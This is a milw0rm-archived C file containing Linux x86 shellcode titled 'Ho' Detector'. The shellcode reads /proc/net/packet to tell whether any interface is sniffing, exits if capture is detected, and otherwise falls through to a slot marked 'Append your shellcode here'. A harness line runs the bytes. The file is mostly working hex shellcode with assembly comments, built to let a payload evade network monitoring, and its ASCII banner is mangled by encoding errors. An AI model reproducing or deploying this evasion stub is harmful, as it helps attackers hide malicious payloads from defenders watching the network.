/*
â–▄∙ â–„ â–„â–„â–„ . â– â–„ ∙ â–Œ â–„ ·. ▄∙ â–„â–Œ â–„â–„â–„â–„â–„ ▄▄▄·
█▌█▌■▀▄.▀· ∙█▌â–â–ˆ ■·██ â–███■█■██▌ ∙██ â–â–ˆ ▀█
·██· â–▀▀■▄ â–â–ˆâ–â–â–Œ ▄█▀▄ â–â–ˆ â–Œâ–â–Œâ–█· █▌â–█▌ â–â–ˆ.■▄█▀▀█
â– â–█·█▌ â–█▄▄▌ ██â–█▌ â–█▌.â–â–Œ ██ ██▌â–█▌ â–█▄█▌ â–█▌· â–â–ˆ â– â–â–Œ
∙▀▀ ▀▀ ▀▀▀ ▀▀ █■▀█▄▀■▀▀ █■▀▀▀ ▀▀▀ ▀▀▀ ▀ ▀
Ho' Detector (Promiscuous mode detector shellcode)
by XenoMuta <xenomuta[at]phreaker[dot]net>
http://xenomuta.tuxfamily.org/
This shellcode uses a stupid, yet effective method
for detecting sniffing on all interfaces in linux:
parsing /proc/net/packet, which contains libpcap's
stats and only one line (56 bytes) when not sniffing.
*/
char sc[]=
"\x66\x31\xC0" // xor eax,eax
"\x66\x50" // push eax
"\x66\x68\x63\x6B\x65\x74" // push dword 0x74656b63 ; cket
"\x66\x68\x74\x2F\x70\x61" // push dword 0x61702f74 ; t/pa
"\x66\x68\x63\x2F\x6E\x65" // push dword 0x656e2f63 ; c/ne
"\x66\x68\x2F\x70\x72\x6F" // push dword 0x6f72702f ; /pro
"\xB0\x05" // mov al,0x5 ; open()
"\x66\x89\xE3" // mov ebx,esp ; /proc/net/packet
"\x66\x31\xC9" // xor ecx,ecx ; O_RDONLY
"\xCD\x80" // int 0x80
"\x66\x93" // xchg eax,ebx
"\x6A\x03" // push byte +0x3 ; read()
"\x66\x58" // pop eax
"\x66\x89\xE1" // mov ecx,esp
"\x6A\x39" // push byte +0x39 ; at most 57 bytes
"\x66\x5A" // pop edx
"\xCD\x80" // int 0x80
"\x3C\x38" // cmp al,0x38 ; if only 56 bytes
"\x74\x06" // jz 0x40 ; there is no packet
"\x6A\x01" // push byte +0x1 ; capture. Proceed
"\x66\x58" // pop eax ; with shellcode
"\xCD\x80" // int 0x80 ; else, exit()
/*
Append your shellcode here
*/
"\x90";
main(){(*(void (*)()) sc)();}
-----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAkkjGO0ACgkQ2LnNaOYR/B1h1QCg2uatkfAzSE5Jgc3bzJmFU/3s
opMAoLufSxvFoSNl3W+6h5rxmLIcq2Mp
=ISTU
-----END PGP SIGNATURE-----
// milw0rm.com [2008-11-18]
